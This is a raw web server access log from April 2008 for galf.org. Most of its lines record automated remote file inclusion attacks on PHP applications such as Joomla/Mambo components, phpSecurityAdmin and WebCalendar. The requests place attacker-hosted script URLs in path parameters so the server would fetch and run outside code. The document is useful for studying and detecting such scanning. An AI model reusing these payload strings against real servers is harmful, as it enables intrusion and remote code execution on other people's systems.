69.59.22.11 - - [27/Apr/2008:18:02:52 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.59.22.11 - - [27/Apr/2008:18:02:57 -0700] "GET /logs/access_080113.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.141.56.36 - - [27/Apr/2008:18:05:53 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://modelroom.com/cache/idnews.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:06:49 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
213.215.223.191 - - [27/Apr/2008:18:07:34 -0700] "GET /index.php?option=com_contact&task=&Itemid=&mosConfig_absolute_path=http://mildnet.sitesled.com/sken/perl/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
213.215.223.191 - - [27/Apr/2008:18:07:34 -0700] "GET /logs/index.php?option=com_contact&task=&Itemid=&mosConfig_absolute_path=http://mildnet.sitesled.com/sken/perl/test.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
72.89.191.68 - - [27/Apr/2008:18:07:50 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
72.89.191.68 - - [27/Apr/2008:18:07:50 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
210.109.102.108 - - [27/Apr/2008:18:08:25 -0700] "GET /logs/access.log/main.php?page=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
210.109.102.108 - - [27/Apr/2008:18:08:26 -0700] "GET /main.php?page=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
210.109.102.108 - - [27/Apr/2008:18:08:26 -0700] "GET /logs/main.php?page=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
75.126.114.42 - - [27/Apr/2008:18:08:44 -0700] "GET /logs/access_071231.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:08:44 -0700] "GET /logs/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:09:09 -0700] "GET /logs/access.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
74.202.128.5 - - [27/Apr/2008:18:09:11 -0700] "GET /upgrade_album.php?GALLERY_BASEDIR=http://groopal.com/form/forms.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
198.106.231.114 - - [27/Apr/2008:18:11:02 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.misapri.com//includes/data/temp?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
198.106.231.114 - - [27/Apr/2008:18:11:02 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.misapri.com//includes/data/temp?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
85.17.1.143 - - [27/Apr/2008:18:11:39 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "galf.org"
85.17.1.143 - - [27/Apr/2008:18:11:39 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "galf.org"
85.17.1.143 - - [27/Apr/2008:18:11:40 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "galf.org"
195.205.214.163 - - [27/Apr/2008:18:12:06 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.marc-bolan.com/cartnew/product_uploads/%20%20%20/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.55.209.195 - - [27/Apr/2008:18:12:21 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.195 - - [27/Apr/2008:18:12:21 -0700] "GET /logs/access_071015.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
87.229.26.205 - - [27/Apr/2008:18:12:49 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
87.229.26.205 - - [27/Apr/2008:18:12:55 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
213.215.228.13 - - [27/Apr/2008:18:13:16 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
213.215.228.13 - - [27/Apr/2008:18:13:16 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
72.89.191.68 - - [27/Apr/2008:18:14:05 -0700] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
72.89.191.68 - - [27/Apr/2008:18:14:05 -0700] "GET //components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
85.17.1.143 - - [27/Apr/2008:18:14:21 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "galf.org"
67.19.51.194 - - [27/Apr/2008:18:14:29 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
67.19.51.194 - - [27/Apr/2008:18:14:29 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/colour.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:14:44 -0700] "GET //index2.php?option=com_zoom&task=§ionid=&id=&mosConfig_absolute_path=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
208.100.1.157 - - [27/Apr/2008:18:15:10 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.100.1.157 - - [27/Apr/2008:18:15:10 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.100.1.157 - - [27/Apr/2008:18:15:10 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.84.188.7 - - [27/Apr/2008:18:15:30 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.86.49.98 - - [27/Apr/2008:18:16:14 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
70.86.49.98 - - [27/Apr/2008:18:16:14 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
85.11.108.130 - - [27/Apr/2008:18:16:34 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.18.243 - - [27/Apr/2008:18:16:37 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.18.243 - - [27/Apr/2008:18:16:37 -0700] "GET /logs/access_070709.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.17.1.143 - - [27/Apr/2008:18:17:29 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
85.17.1.143 - - [27/Apr/2008:18:17:33 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
85.17.1.143 - - [27/Apr/2008:18:17:33 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
85.17.1.143 - - [27/Apr/2008:18:17:33 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:17:39 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:18:06 -0700] "GET /logs/access_071029.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:18:06 -0700] "GET /logs/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:18:09 -0700] "GET /logs/access_071014.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
70.86.49.98 - - [27/Apr/2008:18:18:35 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
70.86.49.98 - - [27/Apr/2008:18:18:42 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:19:06 -0700] "GET //index2.php?option=com_zoom&task=§ionid=&id=&mosConfig_absolute_path=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "galf.org"
70.86.49.98 - - [27/Apr/2008:18:20:00 -0700] "GET /logs/playing.php/common/db.php?commonpath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
70.86.49.98 - - [27/Apr/2008:18:20:00 -0700] "GET /playing.php/common/db.php?commonpath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:21:02 -0700] "GET /logs/access_071203.log//agendax/addevent.inc.php?agendax_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:21:02 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:21:03 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
66.98.216.89 - - [27/Apr/2008:18:21:05 -0700] "GET /logs/access_071015.log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
66.98.216.89 - - [27/Apr/2008:18:21:06 -0700] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
66.98.216.89 - - [27/Apr/2008:18:21:06 -0700] "GET /logs//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
67.228.55.26 - - [27/Apr/2008:18:21:06 -0700] "GET /logs/access_071008.log//agendax/addevent.inc.php?agendax_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
83.3.167.234 - - [27/Apr/2008:18:21:48 -0700] "GET /logs/access_071015.log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.3.167.234 - - [27/Apr/2008:18:21:49 -0700] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.3.167.234 - - [27/Apr/2008:18:21:49 -0700] "GET /logs//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.18.231 - - [27/Apr/2008:18:22:04 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.11.222 - - [27/Apr/2008:18:22:05 -0700] "GET /?S=A HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.15.138.183 - - [27/Apr/2008:18:22:14 -0700] "GET /logs/access_071015.log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
64.15.138.183 - - [27/Apr/2008:18:22:14 -0700] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
64.15.138.183 - - [27/Apr/2008:18:22:14 -0700] "GET /logs//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
68.165.216.146 - - [27/Apr/2008:18:22:27 -0700] "GET /logs/access_071015.log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
68.165.216.146 - - [27/Apr/2008:18:22:27 -0700] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
68.165.216.146 - - [27/Apr/2008:18:22:27 -0700] "GET /logs//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
200.213.0.1 - - [27/Apr/2008:18:22:44 -0700] "GET /logs/access_071015.log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.213.0.1 - - [27/Apr/2008:18:22:45 -0700] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.213.0.1 - - [27/Apr/2008:18:22:45 -0700] "GET /logs//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.14.1.101 - - [27/Apr/2008:18:22:54 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.14.1.101 - - [27/Apr/2008:18:22:54 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.14.1.101 - - [27/Apr/2008:18:22:55 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/font.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.98.216.89 - - [27/Apr/2008:18:23:47 -0700] "GET /logs/access_080113.log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
64.15.138.183 - - [27/Apr/2008:18:24:53 -0700] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
66.98.216.89 - - [27/Apr/2008:18:25:05 -0700] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
64.15.138.183 - - [27/Apr/2008:18:25:23 -0700] "GET /logs/access_080113.log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:25:26 -0700] "GET /logs/access_071231.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:25:26 -0700] "GET /logs/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:25:51 -0700] "GET /logs/access.log/webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
85.17.1.143 - - [27/Apr/2008:18:26:11 -0700] "GET /logs/access_080113.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.studio-wave.com/concept/images/css.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.89.191.68 - - [27/Apr/2008:18:26:18 -0700] "GET /logs//?mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 200 7521 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
72.89.191.68 - - [27/Apr/2008:18:26:18 -0700] "GET //?mosConfig_absolute_path=http://h1.ripway.com/znorte/test.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
68.165.216.146 - - [27/Apr/2008:18:26:31 -0700] "GET /logs/access_080113.log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
83.3.167.234 - - [27/Apr/2008:18:26:36 -0700] "GET /logs/access_080113.log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.3.167.234 - - [27/Apr/2008:18:26:44 -0700] "GET //components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.213.0.1 - - [27/Apr/2008:18:26:59 -0700] "GET /logs/access_080113.log//components/errors.php?error=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.126.115.170 - - [27/Apr/2008:18:27:40 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.115.170 - - [27/Apr/2008:18:27:40 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.115.170 - - [27/Apr/2008:18:27:40 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.115.170 - - [27/Apr/2008:18:27:43 -0700] "GET /logs/access_070917.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
72.232.122.239 - - [27/Apr/2008:18:27:47 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
72.232.122.239 - - [27/Apr/2008:18:27:58 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
75.126.115.170 - - [27/Apr/2008:18:28:11 -0700] "GET /logs/access_080128.log/components/com_performs/performs.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.115.170 - - [27/Apr/2008:18:28:11 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
75.126.115.170 - - [27/Apr/2008:18:28:12 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
69.59.22.11 - - [27/Apr/2008:18:28:24 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.59.22.11 - - [27/Apr/2008:18:28:24 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.59.22.11 - - [27/Apr/2008:18:28:24 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.freewebtown.com/amir5/idat.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
75.126.114.42 - - [27/Apr/2008:18:28:49 -0700] "GET /webcalendar//tools/send_reminders.php?noSet=0&includedir=http://www.dokoiku.jp/master/zip_code/tools/temp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
208.100.1.157 - - [27/Apr/2008:18:29:07 -0700] "GET /logs/access_080113.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://h1.ripway.com/cyber1212/plugin/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.109.102.108 - - [27/Apr/2008:18:29:07 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.neobit.simset.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_d44d7fb098dd72c08c79c2dd4df809xx?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
75.126.115.170 - - [27/Apr/2008:18:29:22 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hudec.iurnik.si/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.galf.org"
65.36.177.149 - - [27/Apr/2008:18:29:34 -0700] "GET /logs/access.log/index2.php?x=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
65.36.177.149 - - [27/Apr/2008:18:29:34 -0700] "GET /index2.php?x=http://www.ttb.org.tr/avian/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
